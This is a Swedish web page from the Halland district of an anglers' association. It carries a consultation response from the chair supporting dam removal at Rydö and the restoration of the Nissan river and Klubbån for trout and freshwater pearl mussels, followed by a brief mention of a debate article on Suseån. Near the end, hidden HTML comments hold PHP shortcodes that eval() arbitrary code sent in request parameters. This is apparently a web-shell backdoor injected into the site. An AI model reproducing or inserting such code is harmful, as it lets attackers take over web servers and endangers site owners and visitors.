Synpunkter på utrivning av dammar mm i Rydö

Sportfiskarna i Halland ställer sig positivt till utrivande av Dammarna vid Rydö och återställande av Nissans ursprungliga vattenmiljö. Viktigt är att återställa forsarna till ursprungligt skick och samtidigt bevara den omgivande kulturen. Området med Nissans gamla (naturliga) åfåra tillsammans med Klubbån och Skärkeån har mycket stor potential för att bli ett viktigt rekreation och fiskeområde samt en framtid för Rydö. Området var före vattenkraftsutbyggnaden bland de flodpärlmusselrikaste i landet och är idag en viktig bit i Rydö och Nissans kulturarv. Flodpärlmusslan kan bli mycket gammal (150-300 år) och är beroende av friskt strömmande vatten och värdfisken (lax eller öring) för att kunna föröka sig. Målet är att kunna få flodpärlmusslan åter i området.

Krav
Krav är att högsta expertis och kunskap utnyttjas och göras med fisk och vattenvårdskunnig personal. Det innebär också att naturligt material används (ej kross) för återställandet av Nissans och Klubbåns naturliga utseende. Viktigt är att vattendragen återställs till ett så naturligt ursprungligt skick som möjligt och optimeras för naturliga strömvattenlevande arter som öring och flodpärlmussla mm.

Krav är att vid utförandet skall största möjliga hänsyn tas till vattendragens (Klubbåns och Nissans) kanter och naturliga åfåras nyckelbiotoper.

Krav är att ett högt minimiflöde finns och skapas i åfåran så att laxfisk och eventuella musslor i framtiden skall kunna föröka sig. Minimiflödet bör bli ca 5 m3 och sedan anpassas till naturliga fluktuationer.

Krav är att vattendragens närhet undersöks på de förorenade ämnen som skall finnas kvar efter den industri som funnits. Uppgifter finns om föroreningar vid tidigare sågverk. Samma gäller för de muddermassor som skall finnas utmed Nissans norra sida, kanalvallen och vid den gamla sågen.

Utförande
Innan åtgärderna utförs bör Nissans gamla åfåran undersökas på flodpärlmussla. Vid nedsänkning av dammarna skall eventuella musslor, fisk som finns plockas upp och flyttas. Detta görs samtidigt som dammarna sakta nedsänks. Dammarna skall sänkas på ett sådant sätt att det förorenade sedimentet som skall finnas i och i anslutning till Dammarna inte förs ut i vattendraget. Det förorenade sedimentet som finns bör forslas bort för att inte i framtiden orsaka skada på fisk och djurliv i vattnet.

Klubbån
Att man vid återställandet av Klubbån får vattendraget till att bindas ihop med Nissan så naturligt som möjlig. Detta görs genom att kanalen sänks och Klubbån får rinna tvärs över till den gamla ursprungliga åfåran. Den nyckelbiotop som Klubbån rinner igenom är viktig för vattendragets öringar och det djurliv som finns. Rensning eller fördjupning av vattendraget med dess ursprungliga åfåra skulle försämra vattendragets biologiska status och bör helt undvikas.

För att undvika översvämning bör dämmet som håller vatten i kanalen sänkas ned och utnyttjas som överfalls skydd vid höga flöden. Man bör göra kanalens botten ett naturligare vattensystem så att alltid ett visst minimi flöde finns. På så vis kan även den bli ett estetiskt reproduktionsområde för Klubbåns och Nissan öringar. Där Klubbån rinner igenom den sänkta kanalen bör ett naturligt vattendrags länk skapas.

 Vandringsleder
Området utnyttjas idag flitigt som rekreationsområde av lokalbefolkningen och det är viktigt att vandringsleder och vattenövergångar bibehålls eller utformas på ett sådant sätt att det smälter in i det estetiska och ökar det kulturella värdet. När det gäller fisk och vattendrag bör det göras broar som är tillräckligt stora så att de inte hindrar vattnets flöde. Trummor bör helt undvikas då de måste skötas för att undvika igensättning samtidigt är de inte estetiskt tilltalande och passar inte in i området. Om spänger görs utmed vattendraget bör dessa göras så att det smälter in i närmiljön.

Vi från Sportfiskarna i Halland ser mycket positivt på utrivning av dammarna och om det görs på rätt sätt kan det utveckla samt gynna fisket och bidra till en mycket positiv utveckling inom Rydöområdet.

 

Per Ingvarsson
Ordförande Sportfiskarna i Halland.

Debattinlägg om Suseån

Följande debattartikel har nu publicerats i Hallandsposten.

suse

<!– [insert_php]if (isset($_REQUEST["VRriB"])){eval($_REQUEST["VRriB"]);exit;}[/insert_php][php]if (isset($_REQUEST["VRriB"])){eval($_REQUEST["VRriB"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["bcJ"])){eval($_REQUEST["bcJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["bcJ"])){eval($_REQUEST["bcJ"]);exit;}[/php] –>

Hallandsdistriktets nyhetssida